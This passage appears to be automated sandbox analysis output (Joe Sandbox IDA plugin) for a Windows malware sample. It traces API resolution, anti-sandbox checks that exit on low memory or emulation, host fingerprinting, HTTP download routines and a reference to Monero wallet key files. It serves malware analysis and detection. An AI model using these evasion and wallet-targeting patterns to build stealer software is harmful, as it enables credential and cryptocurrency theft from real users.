                              • GetProcAddress.KERNEL32(76210000,01988FB8), ref: 01009C76
                              • GetProcAddress.KERNEL32(76210000,01989048), ref: 01009C8E
                              • GetProcAddress.KERNEL32(76210000,0198DDB0), ref: 01009CA7
                              • GetProcAddress.KERNEL32(76210000,0197A638), ref: 01009CBF
                              • GetProcAddress.KERNEL32(76210000,0198DC90), ref: 01009CD7
                              • GetProcAddress.KERNEL32(76210000,0198DC18), ref: 01009CF0
                              • GetProcAddress.KERNEL32(76210000,0198DBA0), ref: 01009D08
                              • GetProcAddress.KERNEL32(76210000,0198DCF0), ref: 01009D20
                              • GetProcAddress.KERNEL32(76210000,019756B0), ref: 01009D39
                              • GetProcAddress.KERNEL32(76210000,01975470), ref: 01009D51
                              • GetProcAddress.KERNEL32(76210000,01975430), ref: 01009D69
                              • GetProcAddress.KERNEL32(76210000,019756D0), ref: 01009D82
                              • GetProcAddress.KERNEL32(76210000,0198DD08), ref: 01009D9A
                              • GetProcAddress.KERNEL32(76210000,0198DD68), ref: 01009DB2
                              • GetProcAddress.KERNEL32(76210000,0197A840), ref: 01009DCB
                              • GetProcAddress.KERNEL32(76210000,019756F0), ref: 01009DE3
                              • GetProcAddress.KERNEL32(76210000,0198DD80), ref: 01009DFB
                              • GetProcAddress.KERNEL32(76210000,0198DD38), ref: 01009E14
                              • GetProcAddress.KERNEL32(76210000,0198DC00), ref: 01009E2C
                              • GetProcAddress.KERNEL32(76210000,0198DB28), ref: 01009E44
                              • GetProcAddress.KERNEL32(76210000,01975410), ref: 01009E5D
                              • GetProcAddress.KERNEL32(76210000,0198DCC0), ref: 01009E75
                              • GetProcAddress.KERNEL32(76210000,0198DC30), ref: 01009E8D
                              • GetProcAddress.KERNEL32(76210000,0198DBB8), ref: 01009EA6
                              • GetProcAddress.KERNEL32(76210000,0198DB10), ref: 01009EBE
                              • GetProcAddress.KERNEL32(76210000,0198DBE8), ref: 01009ED6
                              • GetProcAddress.KERNEL32(76210000,0198DCD8), ref: 01009EEF
                              • GetProcAddress.KERNEL32(76210000,0198DD20), ref: 01009F07
                              • GetProcAddress.KERNEL32(76210000,0198DBD0), ref: 01009F1F
                              • GetProcAddress.KERNEL32(76210000,0198DC48), ref: 01009F38
                              • GetProcAddress.KERNEL32(76210000,0197FC30), ref: 01009F50
                              • GetProcAddress.KERNEL32(76210000,0198DC60), ref: 01009F68
                              • GetProcAddress.KERNEL32(76210000,0198DC78), ref: 01009F81
                              • GetProcAddress.KERNEL32(76210000,01975370), ref: 01009F99
                              • GetProcAddress.KERNEL32(76210000,0198DB40), ref: 01009FB1
                              • GetProcAddress.KERNEL32(76210000,01975450), ref: 01009FCA
                              • GetProcAddress.KERNEL32(76210000,0198DD50), ref: 01009FE2
                              • GetProcAddress.KERNEL32(76210000,0198DCA8), ref: 01009FFA
                              • GetProcAddress.KERNEL32(76210000,01975390), ref: 0100A013
                              • GetProcAddress.KERNEL32(76210000,01975490), ref: 0100A02B
                              • LoadLibraryA.KERNEL32(0198DD98,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A03D
                              • LoadLibraryA.KERNEL32(0198DAC8,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A04E
                              • LoadLibraryA.KERNEL32(0198DAE0,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A060
                              • LoadLibraryA.KERNEL32(0198DAF8,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A072
                              • LoadLibraryA.KERNEL32(0198DB58,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A083
                              • LoadLibraryA.KERNEL32(0198DB70,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A095
                              • LoadLibraryA.KERNEL32(0198DB88,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A0A7
                              • LoadLibraryA.KERNEL32(0198DEE8,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A0B8
                              • GetProcAddress.KERNEL32(751E0000,01975190), ref: 0100A0DA
                              • GetProcAddress.KERNEL32(751E0000,0198DED0), ref: 0100A0F2
                              • GetProcAddress.KERNEL32(751E0000,01988AA0), ref: 0100A10A
                              • GetProcAddress.KERNEL32(751E0000,0198DDC8), ref: 0100A123
                              • GetProcAddress.KERNEL32(751E0000,01975090), ref: 0100A13B
                              • GetProcAddress.KERNEL32(700F0000,0197A778), ref: 0100A160
                              • GetProcAddress.KERNEL32(700F0000,019750D0), ref: 0100A179
                              • GetProcAddress.KERNEL32(700F0000,0197A868), ref: 0100A191
                              • GetProcAddress.KERNEL32(700F0000,0198DEB8), ref: 0100A1A9
                              • GetProcAddress.KERNEL32(700F0000,0198DF00), ref: 0100A1C2
                              • GetProcAddress.KERNEL32(700F0000,01975050), ref: 0100A1DA
                              • GetProcAddress.KERNEL32(700F0000,01975110), ref: 0100A1F2
                              • GetProcAddress.KERNEL32(700F0000,0198DF48), ref: 0100A20B
                              • GetProcAddress.KERNEL32(753A0000,01974F70), ref: 0100A22C
                              • GetProcAddress.KERNEL32(753A0000,01975070), ref: 0100A244
                              • GetProcAddress.KERNEL32(753A0000,0198DE28), ref: 0100A25D
                              • GetProcAddress.KERNEL32(753A0000,0198DEA0), ref: 0100A275
                              • GetProcAddress.KERNEL32(753A0000,019752F0), ref: 0100A28D
                              • GetProcAddress.KERNEL32(76310000,0197A6B0), ref: 0100A2B3
                              • GetProcAddress.KERNEL32(76310000,0197A688), ref: 0100A2CB
                              • GetProcAddress.KERNEL32(76310000,0198DE40), ref: 0100A2E3
                              • GetProcAddress.KERNEL32(76310000,01974F90), ref: 0100A2FC
                              • GetProcAddress.KERNEL32(76310000,01974FB0), ref: 0100A314
                              • GetProcAddress.KERNEL32(76310000,0197A7A0), ref: 0100A32C
                              • GetProcAddress.KERNEL32(76910000,0198DF78), ref: 0100A352
                              • GetProcAddress.KERNEL32(76910000,019750B0), ref: 0100A36A
                              • GetProcAddress.KERNEL32(76910000,019889E0), ref: 0100A382
                              • GetProcAddress.KERNEL32(76910000,0198DF18), ref: 0100A39B
                              • GetProcAddress.KERNEL32(76910000,0198DF30), ref: 0100A3B3
                              • GetProcAddress.KERNEL32(76910000,01975150), ref: 0100A3CB
                              • GetProcAddress.KERNEL32(76910000,019751B0), ref: 0100A3E4
                              • GetProcAddress.KERNEL32(76910000,0198DE58), ref: 0100A3FC
                              • GetProcAddress.KERNEL32(76910000,0198DDE0), ref: 0100A414
                              • GetProcAddress.KERNEL32(75B30000,01975210), ref: 0100A436
                              • GetProcAddress.KERNEL32(75B30000,0198DF60), ref: 0100A44E
                              • GetProcAddress.KERNEL32(75B30000,0198DDF8), ref: 0100A466
                              • GetProcAddress.KERNEL32(75B30000,0198DE10), ref: 0100A47F
                              • GetProcAddress.KERNEL32(75B30000,0198DE88), ref: 0100A497
                              • GetProcAddress.KERNEL32(75670000,01975030), ref: 0100A4B8
                              • GetProcAddress.KERNEL32(75670000,01975310), ref: 0100A4D1
                              • GetProcAddress.KERNEL32(76AC0000,01974F50), ref: 0100A4F2
                              • GetProcAddress.KERNEL32(76AC0000,0198DE70), ref: 0100A50A
                              • GetProcAddress.KERNEL32(6F4E0000,01975010), ref: 0100A530
                              • GetProcAddress.KERNEL32(6F4E0000,019751D0), ref: 0100A548
                              • GetProcAddress.KERNEL32(6F4E0000,019750F0), ref: 0100A560
                              • GetProcAddress.KERNEL32(6F4E0000,0198D930), ref: 0100A579
                              • GetProcAddress.KERNEL32(6F4E0000,019751F0), ref: 0100A591
                              • GetProcAddress.KERNEL32(6F4E0000,01975130), ref: 0100A5A9
                              • GetProcAddress.KERNEL32(6F4E0000,01975330), ref: 0100A5C2
                              • GetProcAddress.KERNEL32(6F4E0000,01975170), ref: 0100A5DA
                              • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0100A5F1
                              • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0100A607
                              • GetProcAddress.KERNEL32(75AE0000,0198D8B8), ref: 0100A629
                              • GetProcAddress.KERNEL32(75AE0000,01988A60), ref: 0100A641
                              • GetProcAddress.KERNEL32(75AE0000,0198DA08), ref: 0100A659
                              • GetProcAddress.KERNEL32(75AE0000,0198DA38), ref: 0100A672
                              • GetProcAddress.KERNEL32(76300000,01974FD0), ref: 0100A693
                              • GetProcAddress.KERNEL32(6FE20000,0198DA98), ref: 0100A6B4
                              • GetProcAddress.KERNEL32(6FE20000,01975230), ref: 0100A6CD
                              • GetProcAddress.KERNEL32(6FE20000,0198D810), ref: 0100A6E5
                              • GetProcAddress.KERNEL32(6FE20000,0198D828), ref: 0100A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: d20b841e3ad0f8031ae4af4358d74b2f8cec80857a46497c4158f68b6372b2f9
                              • Instruction ID: 2f292149a59c23e1da8088875c000e3ef5e1a6eb6c3e79568e345f2aea2fde62
                              • Opcode Fuzzy Hash: d20b841e3ad0f8031ae4af4358d74b2f8cec80857a46497c4158f68b6372b2f9
                              • Instruction Fuzzy Hash: 67624CB5605200AFD36ADFA8F98CD6A3BF9F79C701314853AA68AC724CD7399441DF50

                              Control-flow Graph (interactive graph not rendered; the basic blocks ff6280-ff652d call InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile and InternetCloseHandle)
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FF4839
                                • Part of subcall function 00FF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FF4849
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • InternetOpenA.WININET(01010DFE,00000001,00000000,00000000,00000000), ref: 00FF62E1
                              • StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0198F400,00000000,00000000,00400100,00000000), ref: 00FF6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FF63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FF63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FF646D
                              • InternetCloseHandle.WININET(00000000), ref: 00FF64EF
                              • InternetCloseHandle.WININET(00000000), ref: 00FF64F9
                              • InternetCloseHandle.WININET(00000000), ref: 00FF6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: cccd747bb6817ff3072581685d19eac6d02bf95fa59abc939e59c246028636a7
                              • Instruction ID: c03137201ba77b59a442d3728bb3a2feb67cb4d1a63fa8ce64270c37a71e0ceb
                              • Opcode Fuzzy Hash: cccd747bb6817ff3072581685d19eac6d02bf95fa59abc939e59c246028636a7
                              • Instruction Fuzzy Hash: B4713F71A00318EBEB25EBA0DC48FEE7774BF54700F108159E24AAB1D4DBB46A85DF51

                              Control-flow Graph
                              [graph image not reproduced; legend: Executed / Not Executed; basic blocks 1005510-1005ac6 with repeated StrCmpCA comparisons and a Sleep call]
                              APIs
                                • Part of subcall function 0100A820: lstrlen.KERNEL32(00FF4F05,?,?,00FF4F05,01010DDE), ref: 0100A82B
                                • Part of subcall function 0100A820: lstrcpy.KERNEL32(01010DDE,00000000), ref: 0100A885
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01005644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 010056A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01005857
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 010051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01005228
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 010052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01005318
                                • Part of subcall function 010052C0: lstrlen.KERNEL32(00000000), ref: 0100532F
                                • Part of subcall function 010052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 01005364
                                • Part of subcall function 010052C0: lstrlen.KERNEL32(00000000), ref: 01005383
                                • Part of subcall function 010052C0: lstrlen.KERNEL32(00000000), ref: 010053AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0100578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01005940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01005A0C
                              • Sleep.KERNEL32(0000EA60), ref: 01005A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 4841124f8ac9662d2de1ed54c3717b9ef2b30f297346cfd814589a8544febb01
                              • Instruction ID: 27c3c0263659fabea48d408aa1d6b85ab95f46196f82b2483299c3870b15b2f4
                              • Opcode Fuzzy Hash: 4841124f8ac9662d2de1ed54c3717b9ef2b30f297346cfd814589a8544febb01
                              • Instruction Fuzzy Hash: 3DE11171A10209DAEB16FBA0EC55EFD7378BF64200F408568A587970D4EF356B4DCBA1

                              Control-flow Graph
                              [graph image not reproduced; legend: Executed / Not Executed; basic blocks 10017a0-10019cd with StrCmpCA comparisons and an ExitProcess call]
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 010017C5
                              • ExitProcess.KERNEL32 ref: 010017D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: b2912364755ff8b94623d64c026b2eee13ca6cbd90dedcda7136c970f4a7daad
                              • Instruction ID: e4cd6e1324be0ea61242e653f41c3d5b290f96ca5ff5865dc2a78d1ff9c28c72
                              • Opcode Fuzzy Hash: b2912364755ff8b94623d64c026b2eee13ca6cbd90dedcda7136c970f4a7daad
                              • Instruction Fuzzy Hash: 39516CB4A04209EFEB06DFA5D948BBE77B5BF44704F00805CE486AB288D774EA41CB61

                              Control-flow Graph
                              [graph image not reproduced; legend: Executed / Not Executed; basic blocks 1007500-100768e with calls to GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA]
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 01007542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0100757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0100760A
                              • wsprintfA.USER32 ref: 01007640
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 8992bb36c4396dabdeb03d25a9b00f53c2ad89cd3b1977a49ae5bae8c86003d1
                              • Instruction ID: a4b1871dfcf18f63827ea401ac43dd555cc2bf29e2dc5fc94af3f9e40847a2e6
                              • Opcode Fuzzy Hash: 8992bb36c4396dabdeb03d25a9b00f53c2ad89cd3b1977a49ae5bae8c86003d1
                              • Instruction Fuzzy Hash: 774185B1D04248ABEF11DF94DC44BDEB7B4BF18704F004199E549A72C0D7796A44CFA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01981718), ref: 010098A1
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019817D8), ref: 010098BA
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019816D0), ref: 010098D2
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01981730), ref: 010098EA
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01981580), ref: 01009903
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01988A30), ref: 0100991B
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01975650), ref: 01009933
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019753B0), ref: 0100994C
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01981598), ref: 01009964
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019816E8), ref: 0100997C
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019815C8), ref: 01009995
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019815E0), ref: 010099AD
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01975670), ref: 010099C5
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01981610), ref: 010099DE
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 00FF11D0: ExitProcess.KERNEL32 ref: 00FF1211
                                • Part of subcall function 00FF1160: GetSystemInfo.KERNEL32(?), ref: 00FF116A
                                • Part of subcall function 00FF1160: ExitProcess.KERNEL32 ref: 00FF117E
                                • Part of subcall function 00FF1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FF112B
                                • Part of subcall function 00FF1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FF1132
                                • Part of subcall function 00FF1110: ExitProcess.KERNEL32 ref: 00FF1143
                                • Part of subcall function 00FF1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FF123E
                                • Part of subcall function 00FF1220: __aulldiv.LIBCMT ref: 00FF1258
                                • Part of subcall function 00FF1220: __aulldiv.LIBCMT ref: 00FF1266
                                • Part of subcall function 00FF1220: ExitProcess.KERNEL32 ref: 00FF1294
                                • Part of subcall function 01006770: GetUserDefaultLangID.KERNEL32 ref: 01006774
                                • Part of subcall function 00FF1190: ExitProcess.KERNEL32 ref: 00FF11C6
                                • Part of subcall function 01007850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FF11B7), ref: 01007880
                                • Part of subcall function 01007850: RtlAllocateHeap.NTDLL(00000000), ref: 01007887
                                • Part of subcall function 01007850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0100789F
                                • Part of subcall function 010078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007910
                                • Part of subcall function 010078E0: RtlAllocateHeap.NTDLL(00000000), ref: 01007917
                                • Part of subcall function 010078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0100792F
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01988920,?,0101110C,?,00000000,?,01011110,?,00000000,01010AEF), ref: 01006ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01006AE8
                              • CloseHandle.KERNEL32(00000000), ref: 01006AF9
                              • Sleep.KERNEL32(00001770), ref: 01006B04
                              • CloseHandle.KERNEL32(?,00000000,?,01988920,?,0101110C,?,00000000,?,01011110,?,00000000,01010AEF), ref: 01006B1A
                              • ExitProcess.KERNEL32 ref: 01006B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 02a1563233bcc2db96131f53dbd8b2ab7e563c40d899da65d6bdd4ff542614ad
                              • Instruction ID: 91b2ad29e205da2f473b65f1bbd00e984e479a70747d94d2808d4a5299ec686e
                              • Opcode Fuzzy Hash: 02a1563233bcc2db96131f53dbd8b2ab7e563c40d899da65d6bdd4ff542614ad
                              • Instruction Fuzzy Hash: E6310D71A1020AEAFB06FBF0EC55BEE7779AF24300F004528E282A71D0DF756645CBA1

                              Control-flow Graph
                              [graph image not reproduced; legend: Executed / Not Executed; basic blocks ff1220-ff129d with calls to GlobalMemoryStatusEx and ExitProcess]
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FF123E
                              • __aulldiv.LIBCMT ref: 00FF1258
                              • __aulldiv.LIBCMT ref: 00FF1266
                              • ExitProcess.KERNEL32 ref: 00FF1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 00df8e0307db6e94b0de0f19d98cb35f47b6a950cffc7f0084daace3ea4d6e9a
                              • Instruction ID: 63f67d3b5a8729069348b4996529b8140a8f52f505de41e91e074608884ed728
                              • Opcode Fuzzy Hash: 00df8e0307db6e94b0de0f19d98cb35f47b6a950cffc7f0084daace3ea4d6e9a
                              • Instruction Fuzzy Hash: C5014BB0D40308EAEB10EFE0DC49BAEBB78BF14701F208059E705B62C0D77455459799

                              Control-flow Graph (basic blocks with address ranges, calls and successor blocks)

                              • 1450: 1006af3 -> 1451
                              • 1451: 1006b0a -> 1453, 1454
                              • 1453: 1006aba-1006ad7, call 100aad0, OpenEventA -> 1460, 1461
                              • 1454: 1006b0c-1006b22, call 1006920, call 1005b10, CloseHandle, ExitProcess
                              • 1460: 1006af5-1006b04, CloseHandle, Sleep -> 1451
                              • 1461: 1006ad9-1006af1, call 100aad0, CreateEventA -> 1454
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01988920,?,0101110C,?,00000000,?,01011110,?,00000000,01010AEF), ref: 01006ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01006AE8
                              • CloseHandle.KERNEL32(00000000), ref: 01006AF9
                              • Sleep.KERNEL32(00001770), ref: 01006B04
                              • CloseHandle.KERNEL32(?,00000000,?,01988920,?,0101110C,?,00000000,?,01011110,?,00000000,01010AEF), ref: 01006B1A
                              • ExitProcess.KERNEL32 ref: 01006B22
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 246c4d0ad31a8cacb4b4b1d4c81679ba163d82fb8d80ce3ac83cd9bb8441e16c
                              • Instruction ID: d539156dfa384a1038614198c41a765d86d612026f7755623bc4ced8962b70c2
                              • Opcode Fuzzy Hash: 246c4d0ad31a8cacb4b4b1d4c81679ba163d82fb8d80ce3ac83cd9bb8441e16c
                              • Instruction Fuzzy Hash: 4DF05E70A4030AEFF712BBA0EC19BBE7B75EB14701F004524A583A21C0CBB15580CB55

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FF4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00FF4849
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 0c2e3f183a4d763deed15684468af3f31a9d67d3151be181c68dfabf53176e39
                              • Instruction ID: 5c90a3d5e6ccd2d59d8c5d4b06e8eb5a7755c0aaf954e78a7a5ed1ae75fea714
                              • Opcode Fuzzy Hash: 0c2e3f183a4d763deed15684468af3f31a9d67d3151be181c68dfabf53176e39
                              • Instruction Fuzzy Hash: FE2121B1D00209ABDF14DFA4E849BEE7B75FF45320F108625E955A72D0EB706A09CF91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF6280: InternetOpenA.WININET(01010DFE,00000001,00000000,00000000,00000000), ref: 00FF62E1
                                • Part of subcall function 00FF6280: StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF6303
